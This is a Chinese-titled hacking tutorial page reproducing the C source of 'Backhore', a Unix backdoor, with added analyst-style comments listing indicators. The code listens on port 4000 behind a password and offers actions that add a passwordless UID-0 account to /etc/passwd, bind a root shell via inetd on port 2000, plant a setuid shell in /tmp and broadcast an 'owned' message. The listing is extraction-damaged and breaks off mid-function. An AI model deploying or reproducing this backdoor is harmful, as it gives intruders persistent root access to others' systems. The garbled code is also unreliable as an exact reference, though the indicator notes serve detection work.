初级黑客技巧,老系统用的后门技巧( 二 )


<++> backdoor/remoteback.c
/* Coders:
Theft
Help from:
Sector9, Halogen
Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen, 
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup: 
# gcc -o backhore backhore.c # ./backdoor password & 
Run: 
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.
Distributers:
Ethical Mutiny Crew
*/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
/* TCP port the listener binds to in main(). An unexpected process listening
   on this port is a host- and network-level indicator for this sample. */
#define PORT 4000
/* Not referenced in the part of the listing shown here. */
#define MAXDATASIZE 100
/* Pending-connection queue length passed to listen() in main(). */
#define BACKLOG 10
/* Shorthand used for the sockaddr casts and sizeof expressions in main(). */
#define SA struct sockaddr 
/* Dispatches on the single command character that main() reads from a client
   whose password line matched; defined after main(). */
void handle(int);
/*
 * Entry point of the sample: a password-gated TCP command listener.
 *
 * What the visible code does:
 *   - prints a local banner listing eight commands,
 *   - takes the shared password from argv[1],
 *   - listens on PORT (4000/tcp) on every interface (INADDR_ANY),
 *   - forks one child per connection, wires the socket to stdin/stdout/stderr,
 *     reads one line, compares it with the password and, on a match, reads a
 *     single command character and passes it to handle().
 *
 * Analyst notes (all taken from this listing):
 *   - Indicators: a listener on 4000/tcp; a process whose argument vector
 *     carries the password; and, from the handle() cases visible below, a
 *     "mutiny" UID-0 line appended to /etc/passwd, "backdoor" entries for
 *     2000/tcp appended to /etc/services and /etc/inetd.conf, and a setuid
 *     copy of /bin/sh at /tmp/.sh.
 *   - The socket is plain TCP with no encryption calls, so the password and
 *     command cross the network in cleartext and can be recovered from a
 *     packet capture.
 *   - The listing is extraction-damaged: the #include lines have lost their
 *     header names and the string literals end in a bare 'n', presumably a
 *     newline escape whose backslash was stripped. Verify against an original
 *     copy before relying on exact strings as signatures.
 *
 * Returns: never returns normally; exits with status 1 on a usage or socket
 * setup error, otherwise loops in accept() indefinitely.
 */
int
main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes, cmd;
char ask[10]="Command: ";
char *bytes, *buf, pass[40];
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
/* Banner written to the launcher's own terminal; at this point no socket
   exists, so none of this is sent to a remote client. */
printf("n Backhore BETA by Theftn");
printf(" 1: trojans rc.localn");
printf(" 2: sends a systemwide messagen");
printf(" 3: binds a root shell on port 2000n");
printf(" 4: creates suid sh in /tmpn");
printf(" 5: creates mutiny account uid 0 no passwdn");
printf(" 6: drops to suid shelln");
printf(" 7: information on backhoren");
printf(" 8: contactn");
/* Exactly one argument, the shared password, is required. */
if (argc != 2) {
fprintf(stderr,"Usage: %s passwordn", argv[0]);
exit(1);
}
/* Copies at most 40 bytes into the 40-byte buffer; strncpy adds no
   terminator when the argument is 40 bytes or longer. */
strncpy(pass, argv[1], 40);
/* The password is echoed to stdout in addition to sitting in the argument
   vector, so it can typically be recovered from a process listing, shell
   history or captured terminal output during triage. */
printf("..using password: %s..n", pass);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
/* Bind to PORT on all local addresses. Only these three fields of my_addr
   are set in the visible code. */
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
sin_size = sizeof(SA);
while(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
/* fork() returns 0 in the child, which serves this one connection. */
if (!fork()) {
/* Point stdin, stdout and stderr at the client socket so the stdio calls
   below (and in handle()) read from and write to the remote peer. */
dup2(new_fd, 0);
dup2(new_fd, 1);
dup2(new_fd, 2);
/* Nothing is written to the client before this read, matching the header
   comment's statement that no password prompt is shown.
   NOTE(review): buf is not assigned anywhere in the visible listing before
   this call. */
fgets(buf, 40, stdin);
/* Only an exact match of the received line against the stored password
   reaches the command prompt; any other input closes the connection. */
if (!strcmp(buf, pass)) {
printf("%s", ask);
/* A single character selects the action; see the switch in handle(). */
cmd = getchar();
handle(cmd);
}
close(new_fd);
exit(0);
}
/* Parent: drop its copy of the connection and go back to accept(). */
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* reap exited children without blocking */
}
}
void
handle(int cmd)
{
FILE *fd;
switch(cmd) {
case '1':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("Trojaning rc.localn");
fd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
fclose(fd);
printf("Trojan complete.n");
break;
case '2':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("Sending systemwide message..n");
system("wall Box owned via the Ethical Mutiny Crew");
printf("Message sent.n");
break;
case '3':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("nAdding inetd backdoor... (-p)n");
fd = fopen("/etc/services","a+");
fprintf(fd,"backdoort2000/tcptbackdoorn");
fd = fopen("/etc/inetd.conf","a+");
fprintf(fd,"backdoortstreamttcptnowaittroott/bin/sh -in");
execl("killall", "-HUP", "inetd", NULL);
printf("ndone.n");
printf("telnet to port 2000nn");
break;
case '4':
printf("nBackhore BETA by Theftn");
printf("theft@cyberspace.orgn");
printf("nAdding Suid Shell... (-s)n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4700 /tmp/.sh");
system("chown root:root /tmp/.sh");
printf("nSuid shell added.n");
printf("execute /tmp/.shnn");
break;
case '5':
printf("nBackhore BETA by Theftn");

